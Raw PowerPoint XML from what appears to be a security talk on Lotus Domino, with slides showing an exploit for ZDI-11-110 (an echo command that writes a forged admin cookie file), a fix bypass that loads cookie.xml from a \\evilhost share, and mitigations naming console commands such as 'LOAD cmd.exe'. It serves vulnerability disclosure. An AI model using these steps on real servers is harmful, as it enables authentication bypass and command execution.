            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0"/>
              <a:t>flag = true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 	. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2228850" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>while(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	. . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400"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21</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Выноска 1 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380312" y="3140968"/>
            <a:ext cx="1296144" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 176592"/>
              <a:gd name="adj4" fmla="val -106132"/>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r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00m!</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350083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88640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ZDI-11-110</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1124744"/>
            <a:ext cx="8712968" cy="5256584"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="990000"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" cookie=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dsecrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=“10.10.0.1"^&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n:\domino2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zdi0day_.txt </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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1559" y="2060848"/>
            <a:ext cx="7842967" cy="3672408"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2030330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0912" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mitigations…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1556792"/>
            <a:ext cx="8712968" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Privileges for system console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If ‘admin’ has enough privileges, he can call OS commands as ‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Service password for dangerous functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If service password is not set, then ‘admin’ can call dangerous functions such as ‘LOAD cmd.exe /c net use …’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>One doesn't exclude another!</a:t>
            </a:r>
          </a:p>
          <a:p>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3289114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496" y="404664"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pen-tester vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mitigations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="1532062"/>
            <a:ext cx="9165704" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>If there is a Microsoft AD network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>If  Kerberos is not used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>If Lotus Domino runs as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>win_domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>LotusAcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="2800"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24</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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600" y="3068347"/>
            <a:ext cx="7272808" cy="3601013"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Группа 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3563888" y="3089324"/>
            <a:ext cx="893685" cy="483696"/>
            <a:chOff x="3473484" y="2914482"/>
            <a:chExt cx="666468" cy="298494"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Овал 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3473484" y="2996952"/>
              <a:ext cx="666468" cy="216024"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="34925">
              <a:solidFill>
                <a:srgbClr val="F47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 стрелкой 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3635896" y="2914482"/>
              <a:ext cx="142181" cy="61547"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="34925">
              <a:solidFill>
                <a:srgbClr val="F4740A"/>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Группа 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2714586" y="2924944"/>
            <a:ext cx="1050671" cy="576068"/>
            <a:chOff x="3356411" y="2996952"/>
            <a:chExt cx="783541" cy="465319"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Овал 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3473484" y="2996952"/>
              <a:ext cx="666468" cy="216024"/>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 стрелкой 13"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="3"/>
              <a:endCxn id="18" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3356411" y="3181340"/>
              <a:ext cx="214675" cy="280931"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="34925">
              <a:solidFill>
                <a:srgbClr val="F4740A"/>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Группа 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2267744" y="3192386"/>
            <a:ext cx="1310398" cy="658682"/>
            <a:chOff x="2433946" y="2822131"/>
            <a:chExt cx="977233" cy="406480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Группа 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2433946" y="2822131"/>
              <a:ext cx="783540" cy="406480"/>
              <a:chOff x="3441239" y="2578155"/>
              <a:chExt cx="783540" cy="406480"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Овал 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3441239" y="2768611"/>
                <a:ext cx="666468" cy="216024"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="F47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9" name="Прямая со стрелкой 18"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="18" idx="7"/>
                <a:endCxn id="13" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="4010105" y="2578155"/>
                <a:ext cx="214674" cy="222092"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Прямая со стрелкой 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3293150" y="2834837"/>
              <a:ext cx="118029" cy="151166"/>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Группа 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2972699" y="3153216"/>
            <a:ext cx="722064" cy="399055"/>
            <a:chOff x="2980259" y="2926059"/>
            <a:chExt cx="840000" cy="314869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Прямая со стрелкой 24"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="1"/>
              <a:endCxn id="13" idx="5"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3750011" y="2926059"/>
              <a:ext cx="70248" cy="95482"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="3492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p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2980259" y="2973209"/>
              <a:ext cx="174362" cy="267719"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="34925">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sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Овал 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3190801" y="5589240"/>
            <a:ext cx="2245295" cy="86409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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="3501008"/>
            <a:ext cx="893685" cy="350057"/>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17758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496" y="417984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lotus Domino 8.5.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>8.5.2FP3</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>№1</a:t>
            </a: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25</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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9511" y="1916832"/>
            <a:ext cx="8831127" cy="3168352"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Выноска 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123728" y="2330626"/>
            <a:ext cx="4104456" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49940"/>
              <a:gd name="adj2" fmla="val 100309"/>
              <a:gd name="adj3" fmla="val 178816"/>
              <a:gd name="adj4" fmla="val 129225"/>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\\evilhost\exploit\cookie.xml --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evilhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\exploit\cookie.xml</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198077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17984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lotus Domino 8.5.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>8.5.2FP3</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>№2</a:t>
            </a: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26</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>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504" y="2052925"/>
            <a:ext cx="8897182" cy="3176275"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Выноска 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915816" y="2330626"/>
            <a:ext cx="2709391" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49940"/>
              <a:gd name="adj2" fmla="val 100309"/>
              <a:gd name="adj3" fmla="val 192542"/>
              <a:gd name="adj4" fmla="val 142835"/>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We need client’s cert. for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
